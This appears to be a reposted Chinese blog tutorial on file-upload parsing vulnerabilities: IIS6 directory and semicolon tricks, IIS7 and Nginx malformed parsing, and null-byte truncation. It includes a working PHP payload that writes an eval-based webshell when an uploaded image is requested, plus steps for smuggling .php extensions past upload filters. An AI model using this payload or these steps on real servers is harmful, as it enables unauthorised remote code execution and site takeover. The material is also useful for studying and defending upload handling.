码迷,mamicode.com
首页 > 其他好文 > 详细

文件解析漏洞

时间:2017-09-01 11:19:47      阅读:239      评论:0      收藏:0      [点我收藏+]

标签:请求   iis7   puts   抓包   开始   创建   load   新建   文件   

1:IIS6.0解析漏洞

目录解析漏洞,在以.asp结尾的目录下的文件都会被当作asp文件来执行,比如上传了1.jpg的文件到upload.asp目录下,那么1.jpg文件就会被当作asp文件来执行。

文件名解析漏洞,IIS6.0从左向右解析文件名,遇到分号就会自动终止解析,所以上传形如1.asp;.jpg的文件就被当作1.asp文件来执行。

2:IIS7.0,7.5和Nginx<8.03畸形解析漏洞(写webshell漏洞)

原理:在上传文件所在目录下创建一个一句话木马文件

实现过程:新建一个1.txt文件,内容为<?php fputs(fopen(‘shell.php‘,‘w‘),‘<?php @eval($_POST[test])?>‘)?>,将文件保存成1.jpg格式,上传到服务器,假设上传路径为/upload,

上传成功后,直接访问/upload/1.jpg,此时神奇的畸形解析开始发挥作用啦,我们会神奇的发现/upload目录下创建了一个一句话木马文件shell.php,,,,,,,,,

3:空字节代码绕过漏洞,也叫神奇的00截断,此处的00指的是16进制的00

文件名00截断:直接上实现过程,,,

1)第一种方法:上传文件名为1.php.jpg格式的图马文件,抓包后,在php后面加上一个空格字符,然后到hex中将php后面的空格字符对应的20改为00后放行即可。

2)第二种方法:上传文件名为1.php%00.jpg格式的图马文件,抓包后,将%00进行url解码后放行即可。

请求包中包含上传路径的,可以尝试在路径后面加个脚本文件名,绕后进行00截断,原理都一样,话不多说,直接上实现过程,,,,

实现过程:上传路径/upload/,直接改成/upload/.php%00,再将%00进行url解码后放行即可。。。

 

文件解析漏洞

标签:请求   iis7   puts   抓包   开始   创建   load   新建   文件   

原文地址:http://www.cnblogs.com/peterpan0707007/p/7462237.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!